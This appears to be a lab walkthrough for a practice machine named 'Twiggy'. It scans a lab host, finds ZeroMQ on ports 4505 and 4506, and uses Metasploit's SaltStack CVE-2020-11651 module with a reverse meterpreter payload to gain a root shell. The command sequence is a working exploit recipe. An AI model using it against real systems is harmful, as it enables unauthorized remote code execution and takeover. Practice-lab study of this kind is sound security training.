Twiggy

nmap

mkdir nmap
sudo rustscan -a 192.168.234.62 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan

ZeroMQ is running on port 4505 and 4506

After some Googlefu, I found this service is vulnerable to a Remote Code Execution (CVE-2020-11651)

Exploitation

Open msfconsole and search for cve-2020-11651

Let's choose #1 exploit, and set the necessary variables

use exploit/linux/misc/saltstack_salt_unauth_rce
set rhost <target>
set lhost tun0
set lport 4506
set srvhost tun0
set srvport 4506
set payload python/meterpreter/reverse_http
run

After running the exploit you should receive a root meterpreter.

PreviousSirol NextBratarina

Last updated 4 years ago

Was this helpful?